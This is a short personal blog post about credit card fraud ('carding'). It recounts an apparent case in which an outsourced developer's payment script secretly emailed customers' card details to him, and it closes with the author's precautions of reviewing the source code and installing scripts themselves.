After some thought-sharing with friends, I’ve got some links to visit and some things to read. Results were petrifying, to say the least. It’s not like it’s the end of the world, but it does raise the concern of outsourcing in a whole.
The web forum I had a chance to visit (no url here for obvious reasons) is dedicated to carding. You don’t know what this is? Oh, that’s easy – carding is when you open your monthly statement honestly believing that you’ve paid off this credit card last month and then – mwa-ha-ha (aka evil laughter) you see that you have spent quite some money ordering stuff you had no idea about and that goods were shipped somewhere you also have no idea of. That’s it, you just have been carded. Meaning – your credit card’s number have been stolen by someone else and all the money used for ordering some goods that were shipped across the country.
But how is this possible? – you might want to ask. And here’s where the concern arises. Some credit card numbers are stolen by bad guys who invade large companies, steal large amounts of numbers. Banks usually are aware of this, take charge and change your number and pin almost immediately. This is bad for the banks, but simply an inconviniece for you.
What’s worse – is when numbers are stolen from small merchants. The following example is actually a real-world example that I have found on the above mentioned forum. No names were given, so unfortunately I cannot warn the owners of the card or other people who might be affected. The credit card information that was stolen included credit card numbers, CVV2 codes, billing addresses, phone numbers – pretty much all the information you need to make an order on an merchant web site. The interesting thing is – how it got stolen. It was not from a security breach (which would be understandable), however it was from the scripts that were developed by outsourcing vendor. Apparently someone didn’t review the code after it was submitted by programmers from Russia. The trick is that some vendors keep the credit card information in their databases (God knows why). So, when user pays for service or goods the credit card info gets submitted to the database. The programmer only had to make one additional PHP line that e-mails him same data that gets transmitted to the merchant’s credit card processor. This way the process of stealing credit cards gets automated…
Back from article mode. When I outsource things there are two requests that must be met. First – I must see the source code. Second – I myself will install all the scripts. This usually weeds out those, who wish to plant their “seeds of evil” in otherwise perfectly working scripts (and they must work properly, because otherwise the owner or clients would suspect the problem). Ofcourse it doesn’t totally guarantee the security, but it assures at least some additional level of protection for customers.
On the other hand – there’s no way that owner of the store can protect himself from the chargeback if someone makes a purchase with a stolen credit card. Unfortunately…